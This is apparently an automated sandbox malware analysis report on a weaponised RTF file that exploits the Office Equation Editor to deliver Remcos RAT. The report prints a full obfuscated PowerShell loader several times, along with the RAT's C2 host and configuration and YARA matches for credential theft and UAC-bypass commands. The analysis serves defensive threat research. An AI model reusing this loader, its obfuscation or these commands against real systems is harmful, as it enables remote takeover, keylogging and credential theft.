Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4vzwJTZbwT.rtf

Overview

General Information

Sample name:4vzwJTZbwT.rtf
renamed because original name is a hash value
Original sample name:7279ab0fbc0a02d8b6966ed3cdf67aca.rtf
Analysis ID:1484115
MD5:7279ab0fbc0a02d8b6966ed3cdf67aca
SHA1:4a6bef6dba00cc872e10b66b00786ace03e6443a
SHA256:04714ec4a9cfa0304d2de5012ae1081850d2a2b080ad68831ba2c8385bda4d01
Tags:rtf
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2644 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "benchao", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9R4HLX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
4vzwJTZbwT.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xa64:$obj2: \objdata
  • 0xa4a:$obj3: \objupdate
  • 0xa25:$obj6: \objlink

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
    • 0x969c:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
    • 0x96e6:$ole2: d0cf11e0a1b11ae1
    • 0x40ee:$obj2: \objdata
    • 0x40cc:$obj4: \objemb

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              8.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                8.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6c4a8:$a1: Remcos restarted by watchdog!
                • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                8.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6656c:$str_b2: Executing file:
                • 0x675ec:$str_b3: GetDirectListeningPort
                • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x67118:$str_b7: \update.vbs
                • 0x66594:$str_b9: Downloaded file:
                • 0x66580:$str_b10: Downloading file:
                • 0x66624:$str_b12: Failed to upload file:
                • 0x675b4:$str_b13: StartForward
                • 0x675d4:$str_b14: StopForward
                • 0x67070:$str_b15: fso.DeleteFile "
                • 0x67004:$str_b16: On Error Resume Next
                • 0x670a0:$str_b17: fso.DeleteFolder "
                • 0x66614:$str_b18: Uploaded file:
                • 0x665d4:$str_b19: Unable to delete:
                • 0x67038:$str_b20: while fso.FileExists("
                • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
                8.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x6637c:$s1: CoGetObject
                • 0x66390:$s1: CoGetObject
                • 0x663ac:$s1: CoGetObject
                • 0x70338:$s1: CoGetObject
                • 0x6633c:$s2: Elevation:Administrator!new:
                Click to see the 18 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.123.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 172.245.123.11, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Sigma detected: Potential PowerShell Command Line Obfuscation
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WP